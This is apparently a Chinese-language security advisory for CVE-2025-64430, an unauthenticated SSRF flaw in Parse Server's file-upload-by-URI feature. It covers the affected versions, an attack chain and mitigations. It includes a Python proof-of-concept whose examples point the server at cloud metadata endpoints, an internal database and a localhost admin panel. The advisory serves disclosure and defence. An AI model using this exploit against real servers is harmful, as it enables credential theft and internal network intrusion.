CVE-2025-64430 Parse Server SSRF服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64430

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Parse Server

漏洞概述

Parse Server是一个开源后端框架，可以部署在任何可以运行Node.js的基础设施上。在4.2.0至7.5.3版本和8.0.0至8.3.1-alpha.1版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞源于文件上传功能，当用户尝试使用uri参数上传Parse.File时，Parse Server会从请求中提供的URI检索文件数据。攻击者可以构造恶意请求，让Parse Server向任意内部或外部URI发起请求，这不仅可能导致敏感信息泄露（如访问内部服务、云元数据端点），还可能导致服务器在接收响应时崩溃，造成可用性影响。由于该漏洞无需认证且可远程利用，对暴露在互联网的Parse Server实例构成严重安全威胁。

技术细节

漏洞存在于Parse Server的文件上传处理逻辑中。当通过Parse.File的uri参数指定远程文件URL时，服务器端代码会发起HTTP请求获取文件内容。问题在于：1) 服务器对用户提供的URI缺乏充分的验证和限制；2) 支持file://、http://、https://等多种协议；3) 可访问内部网络资源如http://localhost、http://169.254.169.254（云元数据服务）等；4) 恶意构造的请求会导致服务器资源消耗甚至崩溃。攻击者利用此漏洞可以：扫描内网端口和服务、访问云环境元数据获取凭证、探测本地服务、发起对内部系统的二次攻击等。修复方案在7.5.4和8.4.0-alpha.1版本中实施，主要增加了URI白名单机制和协议限制。

攻击链分析

STEP 1

步骤1

攻击者识别暴露在互联网且未修复的Parse Server实例（版本4.2.0-7.5.3或8.0.0-8.3.1-alpha.1）

STEP 2

步骤2

攻击者构造包含恶意URI参数的Parse.File上传请求，URI指向内部服务（如云元数据端点、内部数据库等）

STEP 3

步骤3

Parse Server接收到请求后，对用户提供的URI发起HTTP请求，由于缺乏输入验证，请求被成功执行

STEP 4

步骤4

攻击者可能获取到内部服务的响应数据，实现信息收集、凭证获取或内网探测

STEP 5

步骤5

大量恶意请求可能导致Parse Server资源耗尽或崩溃，造成可用性影响（CVSS可用性影响评级为高）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-64430 Parse Server SSRF PoC
# Target: Parse Server with vulnerable file upload via URI parameter

def exploit_ssrf(target_url, malicious_uri):
    """
    Exploit SSRF vulnerability in Parse Server file upload
    
    Args:
        target_url: Base URL of vulnerable Parse Server
        malicious_uri: Malicious URI to request (e.g., internal service)
    """
    headers = {
        'X-Parse-Application-Id': 'myAppId',
        'Content-Type': 'application/json'
    }
    
    # Payload to trigger SSRF via Parse.File URI parameter
    payload = {
        'file': {
            'uri': malicious_uri,  # SSRF trigger point
            'name': 'malicious.txt'
        }
    }
    
    endpoint = f"{target_url}/parse/files/malicious.txt"
    
    try:
        response = requests.post(
            endpoint,
            headers=headers,
            json=payload,
            timeout=10
        )
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error: {e}")

# Example usage:
# Target internal metadata service (AWS/Azure/GCP)
# exploit_ssrf('http://target-parse-server.com', 'http://169.254.169.254/latest/meta-data/')

# Scan internal service
# exploit_ssrf('http://target-parse-server.com', 'http://internal-db:5432/')

# Access localhost admin panel
# exploit_ssrf('http://target-parse-server.com', 'http://localhost:1337/admin/')

print('[+] SSRF PoC for CVE-2025-64430')
print('[+] Target: Parse Server < 7.5.4 or < 8.4.0-alpha.1')

影响范围

Parse Server >= 4.2.0 且 < 7.5.4

Parse Server >= 8.0.0 且 < 8.4.0-alpha.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在网络层限制Parse Server的出站连接，仅允许访问必要的白名单域名；2) 使用Web应用防火墙(WAF)规则过滤包含uri参数的异常请求；3) 临时禁用Parse.File的URI上传功能；4) 监控Parse Server日志，排查异常的内部网络请求；5) 实施速率限制防止大量SSRF请求。建议尽快升级到官方发布的修复版本。